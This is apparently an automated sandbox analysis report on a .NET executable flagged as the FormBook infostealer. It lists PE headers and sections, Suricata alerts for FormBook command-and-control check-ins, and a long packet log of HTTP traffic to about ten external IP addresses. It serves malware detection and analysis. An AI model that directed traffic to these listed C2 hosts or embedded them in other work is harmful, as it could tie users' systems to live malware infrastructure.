                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xea5540xea600e2f1d7eb1ed1e44c47a4e477f5891e19False0.764178125data7.253794404065134IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xee0000x5ac0x600862b3fedd7dc31adbc33ea5800a3f6dbFalse0.4231770833333333data4.105167481524011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xf00000xc0x200b3afc73af2709d9f2185f15f76e8a215False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_VERSION0xee0900x31cdata0.4371859296482412
                                                                                                            RT_MANIFEST0xee3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-11T04:25:15.778243+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649987154.12.28.18480TCP
                                                                                                            2025-01-11T04:25:15.778243+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649987154.12.28.18480TCP
                                                                                                            2025-01-11T04:25:32.258273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999218.139.62.22680TCP
                                                                                                            2025-01-11T04:25:34.806535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999318.139.62.22680TCP
                                                                                                            2025-01-11T04:25:37.356586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999418.139.62.22680TCP
                                                                                                            2025-01-11T04:25:40.057395+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64999518.139.62.22680TCP
                                                                                                            2025-01-11T04:25:40.057395+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999518.139.62.22680TCP
                                                                                                            2025-01-11T04:25:45.859464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996104.21.112.180TCP
                                                                                                            2025-01-11T04:25:48.426841+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997104.21.112.180TCP
                                                                                                            2025-01-11T04:25:51.015746+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998104.21.112.180TCP
                                                                                                            2025-01-11T04:25:53.531690+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649999104.21.112.180TCP
                                                                                                            2025-01-11T04:25:53.531690+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649999104.21.112.180TCP
                                                                                                            2025-01-11T04:26:07.351723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001209.74.77.10780TCP
                                                                                                            2025-01-11T04:26:09.894738+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002209.74.77.10780TCP
                                                                                                            2025-01-11T04:26:12.517423+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003209.74.77.10780TCP
                                                                                                            2025-01-11T04:26:15.151839+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650004209.74.77.10780TCP
                                                                                                            2025-01-11T04:26:15.151839+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004209.74.77.10780TCP
                                                                                                            2025-01-11T04:26:20.693264+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000584.32.84.3280TCP
                                                                                                            2025-01-11T04:26:23.244343+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000684.32.84.3280TCP
                                                                                                            2025-01-11T04:26:25.792206+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000784.32.84.3280TCP
                                                                                                            2025-01-11T04:26:28.320257+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65000884.32.84.3280TCP
                                                                                                            2025-01-11T04:26:28.320257+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000884.32.84.3280TCP
                                                                                                            2025-01-11T04:26:34.956100+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009154.208.202.22580TCP
                                                                                                            2025-01-11T04:26:37.526967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010154.208.202.22580TCP
                                                                                                            2025-01-11T04:26:40.085710+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011154.208.202.22580TCP
                                                                                                            2025-01-11T04:26:43.085552+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650012154.208.202.22580TCP
                                                                                                            2025-01-11T04:26:43.085552+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012154.208.202.22580TCP
                                                                                                            2025-01-11T04:26:48.757175+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001477.68.64.4580TCP
                                                                                                            2025-01-11T04:26:51.299442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001577.68.64.4580TCP
                                                                                                            2025-01-11T04:26:53.847159+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001677.68.64.4580TCP
                                                                                                            2025-01-11T04:26:56.407542+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001777.68.64.4580TCP
                                                                                                            2025-01-11T04:26:56.407542+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001777.68.64.4580TCP
                                                                                                            2025-01-11T04:27:02.189457+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650018208.91.197.2780TCP
                                                                                                            2025-01-11T04:27:04.768880+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650019208.91.197.2780TCP
                                                                                                            2025-01-11T04:27:07.295998+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020208.91.197.2780TCP
                                                                                                            2025-01-11T04:27:10.240777+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650021208.91.197.2780TCP
                                                                                                            2025-01-11T04:27:10.240777+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650021208.91.197.2780TCP
                                                                                                            2025-01-11T04:27:16.005946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002284.32.84.3280TCP
                                                                                                            2025-01-11T04:27:18.571708+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002384.32.84.3280TCP
                                                                                                            2025-01-11T04:27:21.119975+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002484.32.84.3280TCP
                                                                                                            2025-01-11T04:27:23.657405+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002584.32.84.3280TCP
                                                                                                            2025-01-11T04:27:23.657405+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002584.32.84.3280TCP
                                                                                                            2025-01-11T04:27:29.362741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026104.21.32.180TCP
                                                                                                            2025-01-11T04:27:31.902458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650027104.21.32.180TCP
                                                                                                            2025-01-11T04:27:34.991329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028104.21.32.180TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 04:25:14.901932955 CET4998780192.168.2.6154.12.28.184
                                                                                                            Jan 11, 2025 04:25:14.906864882 CET8049987154.12.28.184192.168.2.6
                                                                                                            Jan 11, 2025 04:25:14.907268047 CET4998780192.168.2.6154.12.28.184
                                                                                                            Jan 11, 2025 04:25:14.926553965 CET4998780192.168.2.6154.12.28.184
                                                                                                            Jan 11, 2025 04:25:14.931360960 CET8049987154.12.28.184192.168.2.6
                                                                                                            Jan 11, 2025 04:25:15.778045893 CET8049987154.12.28.184192.168.2.6
                                                                                                            Jan 11, 2025 04:25:15.778064013 CET8049987154.12.28.184192.168.2.6
                                                                                                            Jan 11, 2025 04:25:15.778243065 CET4998780192.168.2.6154.12.28.184
                                                                                                            Jan 11, 2025 04:25:15.782761097 CET4998780192.168.2.6154.12.28.184
                                                                                                            Jan 11, 2025 04:25:15.787545919 CET8049987154.12.28.184192.168.2.6
                                                                                                            Jan 11, 2025 04:25:31.300573111 CET4999280192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:31.305505037 CET804999218.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:31.305620909 CET4999280192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:31.321279049 CET4999280192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:31.326107979 CET804999218.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:32.258096933 CET804999218.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:32.258174896 CET804999218.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:32.258272886 CET4999280192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:32.837744951 CET4999280192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:33.857389927 CET4999380192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:33.862281084 CET804999318.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:33.862402916 CET4999380192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:33.880604029 CET4999380192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:33.885431051 CET804999318.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:34.806237936 CET804999318.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:34.806292057 CET804999318.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:34.806535006 CET4999380192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:35.384598017 CET4999380192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:36.403683901 CET4999480192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:36.408670902 CET804999418.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:36.408823967 CET4999480192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:36.424560070 CET4999480192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:36.429419994 CET804999418.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:36.429615974 CET804999418.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:37.356348991 CET804999418.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:37.356477022 CET804999418.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:37.356585979 CET4999480192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:37.931586027 CET4999480192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:38.950184107 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:39.105670929 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:39.106000900 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:39.121903896 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:39.126764059 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:40.057163954 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:40.057178020 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:40.057394981 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:40.060190916 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:40.271549940 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:40.271672964 CET4999580192.168.2.618.139.62.226
                                                                                                            Jan 11, 2025 04:25:40.273642063 CET804999518.139.62.226192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.219955921 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:45.224761009 CET8049996104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.224911928 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:45.245505095 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:45.250381947 CET8049996104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.859392881 CET8049996104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.859411001 CET8049996104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.859463930 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:45.860093117 CET8049996104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:45.860152960 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:46.759654999 CET4999680192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:47.779858112 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:47.784807920 CET8049997104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:47.784929037 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:47.805329084 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:47.810200930 CET8049997104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:48.426722050 CET8049997104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:48.426747084 CET8049997104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:48.426841021 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:48.427229881 CET8049997104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:48.427289009 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:49.322137117 CET4999780192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:50.340768099 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:50.345675945 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:50.345761061 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:50.360534906 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:50.365427971 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:50.365545988 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:51.015564919 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:51.015644073 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:51.015746117 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:51.016535997 CET8049998104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:51.018594980 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:51.869045973 CET4999880192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:52.888324976 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:52.893210888 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:52.893300056 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:52.902344942 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:52.907211065 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.531573057 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.531589985 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.531605005 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.531662941 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.531689882 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:53.531776905 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:53.532391071 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:25:53.532440901 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:53.534638882 CET4999980192.168.2.6104.21.112.1
                                                                                                            Jan 11, 2025 04:25:53.539453030 CET8049999104.21.112.1192.168.2.6
                                                                                                            Jan 11, 2025 04:26:06.758033991 CET5000180192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:06.762868881 CET8050001209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:06.762954950 CET5000180192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:06.783107042 CET5000180192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:06.787976980 CET8050001209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:07.351397991 CET8050001209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:07.351583004 CET8050001209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:07.351722956 CET5000180192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:08.291074038 CET5000180192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.309556961 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.314332962 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.314451933 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.327924013 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.334532976 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894550085 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894567966 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894737959 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:10.837917089 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:11.903053999 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:11.907968998 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:11.908648968 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:12.003396034 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:12.008269072 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.008467913 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517261028 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517359972 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517422915 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:13.509700060 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.562381029 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.567532063 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:14.567735910 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.585371017 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.606457949 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.146795034 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.151669979 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.151839018 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:15.152626038 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:15.157383919 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.218405962 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.223241091 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.223334074 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.238878965 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.243757010 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.693172932 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.693264008 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:21.744117022 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:21.749026060 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:22.763937950 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.768814087 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:22.768925905 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.783435106 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.788347006 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:23.244256020 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:23.244343042 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:24.291075945 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:24.295958042 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.310298920 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.315237045 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.315356970 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.335705996 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.340534925 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.340632915 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.792084932 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.792206049 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:26.837893009 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:26.842737913 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:27.857876062 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.862956047 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:27.863070965 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.877451897 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:27.882220030 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319511890 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319631100 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.319643974 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320205927 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320218086 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320230007 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320256948 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320256948 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320501089 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.320935965 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320947886 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320960045 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.320971966 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:28.322635889 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.326208115 CET5000880192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:28.331041098 CET805000884.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.020848036 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.025979042 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.026112080 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.042489052 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:34.047389984 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.955912113 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.956032991 CET8050009154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:34.956099987 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:35.556700945 CET5000980192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.576488972 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.581321955 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:36.581479073 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.601918936 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:36.606829882 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526745081 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526911974 CET8050010154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:37.526967049 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:38.104290009 CET5001080192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.122426033 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.127296925 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:39.127558947 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.142880917 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:39.147838116 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:39.147875071 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085506916 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085541964 CET8050011154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:40.085710049 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:40.650506020 CET5001180192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.669316053 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.674288988 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:41.674388885 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.683470964 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:41.688283920 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085395098 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085490942 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:43.085551977 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:43.088551044 CET5001280192.168.2.6154.208.202.225
                                                                                                            Jan 11, 2025 04:26:43.093385935 CET8050012154.208.202.225192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.146002054 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.150985956 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.151079893 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.166335106 CET5001480192.168.2.677.68.64.45
                                                                                                            Jan 11, 2025 04:26:48.171228886 CET805001477.68.64.45192.168.2.6
                                                                                                            Jan 11, 2025 04:26:48.756928921 CET805001477.68.64.45192.168.2.6
